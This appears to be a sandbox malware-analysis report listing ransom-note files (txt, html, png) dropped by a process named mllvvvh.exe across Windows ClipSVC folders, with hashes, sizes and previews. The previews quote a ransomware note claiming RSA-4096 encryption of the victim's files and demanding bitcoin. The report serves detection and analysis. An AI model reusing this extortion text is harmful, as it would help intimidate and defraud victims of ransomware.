                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\KeyHolder\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Import\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Import\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Import\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Apps\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Apps\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Apps\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Migration\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Migration\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\Migration\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
